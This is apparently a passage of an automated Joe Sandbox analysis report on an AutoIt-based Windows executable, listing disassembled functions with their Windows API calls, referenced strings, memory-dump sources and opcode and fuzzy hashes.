Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 5d5fdeda28c91278be97f35846b1ad83585699f69b26fa5a20c877cacbddfb25
Instruction ID: bcd553c35fc3d4eeb5ab8c97ca1affd2f47b0c41161cc39fe965bf5e1edaf449
Opcode Fuzzy Hash: 5d5fdeda28c91278be97f35846b1ad83585699f69b26fa5a20c877cacbddfb25
Instruction Fuzzy Hash: E2715871549701DEC704EF69EC899ABBBA8FF84340F80092EF555C32A1EF749949CB92

Function 0078514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00785156
LoadCursorW.USER32(00000000,00007F00), ref: 00785165
LoadIconW.USER32(00000063), ref: 0078517C
LoadIconW.USER32(000000A4), ref: 0078518E
LoadIconW.USER32(000000A2), ref: 007851A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007851C6
RegisterClassExW.USER32(?), ref: 0078521C

Part of subcall function 00773411: GetSysColorBrush.USER32(0000000F), ref: 00773444
Part of subcall function 00773411: RegisterClassExW.USER32(00000030), ref: 0077346E
Part of subcall function 00773411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
Part of subcall function 00773411: InitCommonControlsEx.COMCTL32(?), ref: 0077349C
Part of subcall function 00773411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
Part of subcall function 00773411: LoadIconW.USER32(000000A9), ref: 007734C2
Part of subcall function 00773411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1

Strings

0, xrefs: 007851FA
#, xrefs: 00785201
AutoIt v3, xrefs: 0078520B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: cb9491bfd742b7d29c9ee27cc98ff2744ddaefacae37ab2a1009764de54ec54f
Instruction ID: 6542512517b1c09f7dad82d2d3a08dc4a9ae5e0a7dd65432fd194eb1516d6cab
Opcode Fuzzy Hash: cb9491bfd742b7d29c9ee27cc98ff2744ddaefacae37ab2a1009764de54ec54f
Instruction Fuzzy Hash: BA216DB1D04309AFEB209FA4ED09B9E7BF5FB48310F004519F505A62A1C7B69540DF84

Function 007E5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007E5E7E
inet_addr.WSOCK32(?,?,?), ref: 007E5EC3
gethostbyname.WS2_32(?), ref: 007E5ECF
IcmpCreateFile.IPHLPAPI ref: 007E5EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 007E5FD8
WSACleanup.WSOCK32 ref: 007E5FDE

Strings

Ping, xrefs: 007E5F01

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d1c3d8d8fe8b7e90cf84469dbd8ac6340471237adff35fbec727f16a47a2fc35
Instruction ID: 0b591ba1ef54b7854c2b7b56e5b19ff44d63edccd79093440a231f98ead9ddce
Opcode Fuzzy Hash: d1c3d8d8fe8b7e90cf84469dbd8ac6340471237adff35fbec727f16a47a2fc35
Instruction Fuzzy Hash: 2A518A31605745DFDB20EF25CC49B2AB7E4AF48724F148929F999DB2A1DB78E900CB42

Function 00784D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00784E22
KillTimer.USER32(?,00000001), ref: 00784E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00784E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00784E7A
CreatePopupMenu.USER32 ref: 00784E8E
PostQuitMessage.USER32(00000000), ref: 00784EAF

Strings

TaskbarCreated, xrefs: 00784E75

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: fb5e8ee0eaa864c5b6ce3c5fcb2a689b7832a230a9499c51ab6f9f6a23233555
Instruction ID: 9faa0501a0faab4aac7cb655baa855d0c6ddaccaae8d3b1a61ece8b0900ffb28
Opcode Fuzzy Hash: fb5e8ee0eaa864c5b6ce3c5fcb2a689b7832a230a9499c51ab6f9f6a23233555
Instruction Fuzzy Hash: 8241D7B128420BEBEB757F64DC4DB7A3695F785301F000529F502D12A1CABDDC50D7A5

Function 0077AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0077ADE1
OleUninitialize.OLE32(?,00000000), ref: 0077AE80
UnregisterHotKey.USER32(?), ref: 0077AFD7
DestroyWindow.USER32(?), ref: 007B2F64
FreeLibrary.KERNEL32(?), ref: 007B2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 007B2FF6

Strings

close all, xrefs: 0077ADDC

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 1f9b166ec0689203960d97343d6289739bd50110f2241ab127a5e943fbeb7398
Instruction ID: 2a12bac1e41cdc44508d531ab9d48d43ad5b7364ed791382936b7cc05a2d8d2b
Opcode Fuzzy Hash: 1f9b166ec0689203960d97343d6289739bd50110f2241ab127a5e943fbeb7398
Instruction Fuzzy Hash: B0A15D70701212DFDB29EF14C499B69F365BF44740F1082ADE50AAB252DB39ED52CF91

Function 007E20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007E2148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007E218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007E219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E21AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007E21DC
InternetCloseHandle.WININET(00000000), ref: 007E2223

Part of subcall function 007E2B4F: GetLastError.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B64
Part of subcall function 007E2B4F: SetEvent.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B79

Strings

, xrefs: 007E21CD

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 1da7a5ba93f3c4851588834cb15ce8a64c58928ce263d2bd69757204ddd29610
Instruction ID: aae34abee6e98d17172288efa9972ae70287d2e7dda258142e823ea0e8ccbeb2
Opcode Fuzzy Hash: 1da7a5ba93f3c4851588834cb15ce8a64c58928ce263d2bd69757204ddd29610
Instruction Fuzzy Hash: 6C4181B1502248BFEB129F51CC89FBB7BACFF0C354F004116FA059A142DB799E469BA1

Function 007856F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007C0C5B

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

_memset.LIBCMT ref: 00785787
_wcscpy.LIBCMT ref: 007857DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007857EB
__swprintf.LIBCMT ref: 007C0CD1

Strings

'', xrefs: 007C0C95, 007C0C9E, 007C0CA9, 007C0CB7, 007C0CA2, 007C0CAD
Line %d: , xrefs: 007C0CCB
AutoIt - , xrefs: 00785760

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt - $''
API String ID: 230667853-395788996
Opcode ID: 6431b1ccc8bc5e5606e3602c72b165b626cdb1d2f59e960ab11bf6bae6757fbf
Instruction ID: fe9b65077d22144cf393183ad7111cc3f8b246d4a075470dd2cede177e54f65b
Opcode Fuzzy Hash: 6431b1ccc8bc5e5606e3602c72b165b626cdb1d2f59e960ab11bf6bae6757fbf
Instruction Fuzzy Hash: 464193B1048304EAD321FB60DC49FDF77ECAF84350F504A1EF195921A2EB78A649CB96

Function 007850DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00785109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0078512A
ShowWindow.USER32(00000000), ref: 0078513E
ShowWindow.USER32(00000000), ref: 00785147

Strings

edit, xrefs: 00785124
AutoIt v3, xrefs: 00785101, 00785106, 00785107

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 1308554be5bafbd662c84ad576ccd073b1b6a92ffdb01816418b227341f7edb3
Instruction ID: 448877307bab512a9c848268561ac21fb5d33204806bd9a172e5802d15e852d7
Opcode Fuzzy Hash: 1308554be5bafbd662c84ad576ccd073b1b6a92ffdb01816418b227341f7edb3
Instruction Fuzzy Hash: 21F03AB06442947EEA7117276C08F372EBDF7C6F20F00041AB900A22B1CA655840DEB0

Function 007D9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00784A8C: _fseek.LIBCMT ref: 00784AA4

Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DE1
Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DF4

_free.LIBCMT ref: 007D9C5F
_free.LIBCMT ref: 007D9C66
_free.LIBCMT ref: 007D9CD1

Part of subcall function 00792F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792F99
Part of subcall function 00792F85: GetLastError.KERNEL32(00000000,?,00799C54,00000000,00798D5D,007959C3), ref: 00792FAB

_free.LIBCMT ref: 007D9CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 007D9B8F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: fbf437cb0422c114f6c71b3a44b462749b57261469c424e6542ab0f8296d2ddf
Instruction ID: bcacbddf0976f39138d6e6cb0fc9a4de801c241592e2e32aec5cdf969efdd23d
Opcode Fuzzy Hash: fbf437cb0422c114f6c71b3a44b462749b57261469c424e6542ab0f8296d2ddf
Instruction Fuzzy Hash: E15149B1904219EFDF24EF64DC85AAEBBB9FF48304F00409EB249A7341DB755A808F59

Function 0079563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0079569B
_memcpy_s.LIBCMT ref: 0079570D
__read_nolock.LIBCMT ref: 0079576B
__filbuf.LIBCMT ref: 0079578E
_memset.LIBCMT ref: 007957D2

Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 72093f9a23a7f21224305384438e78ba48d8c6feb7d0fcc2392439768f63b933
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: 2C51D430A00B25DBDF268FB9E88466E77B6EF41720F24872DF835962D0D7789E509B40

Function 007752B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077534A
TranslateMessage.USER32(?), ref: 00775356
DispatchMessageW.USER32(?), ref: 00775360

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: a5df2ac3e74764b3a7517cf3ee87b1dcdad73945c1ac94b810f4d3fdd3049602
Instruction ID: 3e3594d673c05dc2df3ff617d0222038a8820727a8f458930f12ea4b350b6331
Opcode Fuzzy Hash: a5df2ac3e74764b3a7517cf3ee87b1dcdad73945c1ac94b810f4d3fdd3049602
Instruction Fuzzy Hash: 4931F670508B059EEF308B64DC48BBA37A8BB82388F148569E42B971F1D7FDD845E711

Function 007D57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5877

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 5062601c18fe17b42b3bfce52969adcc9b11d8c156cbc2f22308089160d83d86
Instruction ID: 51c7f7fcab526f449ce18a9b19d5f79436462491fd06886c3faa4777dbcbe7bb
Opcode Fuzzy Hash: 5062601c18fe17b42b3bfce52969adcc9b11d8c156cbc2f22308089160d83d86
Instruction Fuzzy Hash: E7018C31D01A1DDBCF009FE4DC48AEDBBB8FF08711F004556E442B2241DB389594DBA1

Function 00771284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712A8
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712C9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00771275,SwapMouseButtons,00000004,?), ref: 007712EB

Strings

Control Panel\Mouse, xrefs: 007712A6

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: dcde5a0564ca0457730d11bb98da9d40af65cadb591607315ef3a8d20f1897f4
Instruction ID: 3ada228c7bf1c8f4b1e4da7620f027b32513af0078e816bbdcc49e1f9cbb2d6f
Opcode Fuzzy Hash: dcde5a0564ca0457730d11bb98da9d40af65cadb591607315ef3a8d20f1897f4
Instruction Fuzzy Hash: 33111575610208BFDF208FA8DC84EEEBBACFF05781F508569E809D7210E6759E449BA4

Function 00785B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00785B58

Part of subcall function 007856F8: _memset.LIBCMT ref: 00785787
Part of subcall function 007856F8: _wcscpy.LIBCMT ref: 007857DB
Part of subcall function 007856F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007857EB

KillTimer.USER32(?,00000001,?,?), ref: 00785BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00785BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007C0D7C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: ca8547e97e4d944f68ba63b64e0e6e4b4158818b82d747d41bfbd710cac7caef
Instruction ID: 1c6cb560f312ff44c77265eaccedf7eb84ca21f360b07dbddde63f9df895766b
Opcode Fuzzy Hash: ca8547e97e4d944f68ba63b64e0e6e4b4158818b82d747d41bfbd710cac7caef
Instruction Fuzzy Hash: C221DAB0544B84EFEB739B64C895FEBBFECAF11314F04048DE69A56141C3786A84CB91

Function 0078278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 007849C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007827AF,?,00000001), ref: 007849F4

_free.LIBCMT ref: 007BFB04
_free.LIBCMT ref: 007BFB4B

Part of subcall function 007829BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00782ADF

Strings

Bad directive syntax error, xrefs: 007BFB33

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 2aa258cef5d7b77f613ba2de0e3427806f3961017e0073f2def3cf12f5820153
Instruction ID: 6b30583d3572ebd7f098fb14bd01a3caf358c98a732732d0325265769341578e
Opcode Fuzzy Hash: 2aa258cef5d7b77f613ba2de0e3427806f3961017e0073f2def3cf12f5820153
Instruction Fuzzy Hash: BD914E71950219EFCF18EFA8CC55AEDB7B4FF05710F14852AF815AB291EB38A905CB50

Function 007D9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00784AB2: __fread_nolock.LIBCMT ref: 00784AD0

_wcscmp.LIBCMT ref: 007D9DE1
_wcscmp.LIBCMT ref: 007D9DF4

Strings

FILE, xrefs: 007D9D2D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 08bb2280de11eed4e8a9fb55c056cdac80a536a922600a179c0dd09e184dfb43
Instruction ID: e152e9df3fca6ca2450634e3d1d566c437a9cd4aeae447c6c4c8823e0cf7f848
Opcode Fuzzy Hash: 08bb2280de11eed4e8a9fb55c056cdac80a536a922600a179c0dd09e184dfb43
Instruction Fuzzy Hash: D841D972A4021AFADF21EAE4CC49FDF7BBDEF45710F00446AFA00BB281D67999448765

